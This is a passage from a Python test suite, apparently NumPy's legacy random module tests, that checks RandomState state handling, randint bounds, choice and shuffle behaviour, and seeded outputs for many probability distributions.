pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.random_state = random.RandomState(self.seed)
self.state = self.random_state.get_state()
def test_basic(self):
old = self.random_state.tomaxint(16)
self.random_state.set_state(self.state)
new = self.random_state.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(self.state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.random_state.standard_normal()
state = self.random_state.get_state()
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.random_state.standard_normal(size=16)
self.random_state.set_state(old_state)
x2 = self.random_state.standard_normal(size=16)
self.random_state.set_state(self.state)
x3 = self.random_state.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.random_state.negative_binomial(0.5, 0.5)
def test_get_state_warning(self):
rs = random.RandomState(PCG64())
with suppress_warnings() as sup:
w = sup.record(RuntimeWarning)
state = rs.get_state()
assert_(len(w) == 1)
assert isinstance(state, dict)
assert state['bit_generator'] == 'PCG64'
def test_invalid_legacy_state_setting(self):
state = self.random_state.get_state()
new_state = ('Unknown', ) + state[1:]
assert_raises(ValueError, self.random_state.set_state, new_state)
assert_raises(TypeError, self.random_state.set_state,
np.array(new_state, dtype=object))
state = self.random_state.get_state(legacy=False)
del state['bit_generator']
assert_raises(ValueError, self.random_state.set_state, state)
def test_pickle(self):
self.random_state.seed(0)
self.random_state.random_sample(100)
self.random_state.standard_normal()
pickled = self.random_state.get_state(legacy=False)
assert_equal(pickled['has_gauss'], 1)
rs_unpick = pickle.loads(pickle.dumps(self.random_state))
unpickled = rs_unpick.get_state(legacy=False)
assert_mt19937_state_equal(pickled, unpickled)
def test_state_setting(self):
attr_state = self.random_state.__getstate__()
self.random_state.standard_normal()
self.random_state.__setstate__(attr_state)
state = self.random_state.get_state(legacy=False)
assert_mt19937_state_equal(attr_state, state)
def test_repr(self):
assert repr(self.random_state).startswith('RandomState(MT19937)')
class TestRandint:
rfunc = random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
# We use a sha256 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '509aea74d792fb931784c4b0135392c65aec64beee12b0cc167548a2c3d31e71',
'int16': '7b07f1a920e46f6d0fe02314155a2330bcfd7635e708da50e536c5ebb631a7d4',
'int32': 'e577bfed6c935de944424667e3da285012e741892dcb7051a8f1ce68ab05c92f',
'int64': '0fbead0b06759df2cfb55e43148822d4a1ff953c7eb19a5b08445a63bb64fa9e',
'int8': '001aac3a5acb935a9b186cbe14a1ca064b8bb2dd0b045d48abeacf74d0203404',
'uint16': '7b07f1a920e46f6d0fe02314155a2330bcfd7635e708da50e536c5ebb631a7d4',
'uint32': 'e577bfed6c935de944424667e3da285012e741892dcb7051a8f1ce68ab05c92f',
'uint64': '0fbead0b06759df2cfb55e43148822d4a1ff953c7eb19a5b08445a63bb64fa9e',
'uint8': '001aac3a5acb935a9b186cbe14a1ca064b8bb2dd0b045d48abeacf74d0203404'}
for dt in self.itype[1:]:
random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.sha256(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.sha256(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
@pytest.mark.skipif(np.iinfo('l').max < 2**32,
reason='Cannot test with 32-bit C long')
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[3992670689, 2438360420, 2557845020],
[4107320065, 4142558326, 3216529513],
[1605979228, 2807061240, 665605495]],
[[3211410639, 4128781000, 457175120],
[1712592594, 1282922662, 3081439808],
[3997822960, 2008322436, 1563495165]],
[[1398375547, 4269260146, 115316740],
[3414372578, 3437564012, 2112038651],
[3572980305, 2260248732, 3908238631]],
[[2561372503, 223155946, 3127879445],
[ 441282060, 3514786552, 2148440361],
[1629275283, 3479737011, 3003195987]],
[[ 412181688, 940383289, 3047321305],
[2978368172, 764731833, 2282559898],
[ 105711276, 720447391, 3596512484]]])
for size in [None, (5, 3, 3)]:
random.seed(12345)
x = self.rfunc([[-1], [0], [1]], [2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
random.seed(self.seed)
actual = random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rand_singleton(self):
random.seed(self.seed)
actual = random.rand()
desired = 0.61879477158567997
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
random.seed(self.seed)
actual = random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.randn()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_randint(self):
random.seed(self.seed)
actual = random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(198, size=(3, 2))
assert_(len(w) == 1)
assert_array_equal(actual, desired + 100)
def test_tomaxint(self):
random.seed(self.seed)
rs = random.RandomState(self.seed)
actual = rs.tomaxint(size=(3, 2))
if np.iinfo(int).max == 2147483647:
desired = np.array([[1328851649, 731237375],
[1270502067, 320041495],
[1908433478, 499156889]], dtype=np.int64)
else:
desired = np.array([[5707374374421908479, 5456764827585442327],
[8196659375100692377, 8224063923314595285],
[4220315081820346526, 7177518203184491332]],
dtype=np.int64)
assert_equal(actual, desired)
rs.seed(self.seed)
actual = rs.tomaxint()
assert_equal(actual, desired[0, 0])
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
typer = np.dtype('l').type
actual = random.random_integers(typer(np.iinfo('l').max),
typer(np.iinfo('l').max))
assert_(len(w) == 1)
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
random.seed(self.seed)
actual = random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
random.seed(self.seed)
actual = random.random_sample()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_choice_uniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random.seed(self.seed)
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random.seed(self.seed)
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random.seed(self.seed)
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.randint(0, -10, size=0).shape, (0,))
assert_equal(random.randint(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random.seed(self.seed)
non_contig = random.choice(5, 3, p=p[::2])
random.seed(self.seed)
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_bytes(self):
random.seed(self.seed)
actual = random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_permutation(self):
random.seed(self.seed)
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [0, 1, 9, 6, 2, 4, 5, 8, 7, 3]
assert_array_equal(actual, desired)
random.seed(self.seed)
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
random.seed(self.seed)
bad_x_str = "abcd"
assert_raises(IndexError, random.permutation, bad_x_str)
random.seed(self.seed)
bad_x_float = 1.2
assert_raises(IndexError, random.permutation, bad_x_float)
integer_val = 10
desired = [9, 0, 8, 5, 1, 3, 4, 7, 6, 2]
random.seed(self.seed)
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_beta(self):
random.seed(self.seed)
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random.seed(self.seed)
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
random.seed(self.seed)
actual = random.binomial(100.123, .456)
desired = 37
assert_array_equal(actual, desired)
def test_chisquare(self):
random.seed(self.seed)
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random.seed(self.seed)
non_contig = random.dirichlet(alpha, size=(3, 2))
random.seed(self.seed)
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_exponential(self):
random.seed(self.seed)
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random.seed(self.seed)
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random.seed(self.seed)
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random.seed(self.seed)
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random.seed(self.seed)
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random.seed(self.seed)
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random.seed(self.seed)
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random.seed(self.seed)
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random.seed(self.seed)
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random.seed(self.seed)
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random.seed(self.seed)
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
def test_negative_binomial(self):
random.seed(self.seed)
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with suppress_warnings() as sup:
sup.record(RuntimeWarning)
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_noncentral_chisquare(self):
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
random.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.seed(self.seed)
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random.seed(self.seed)
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.seed(self.seed)
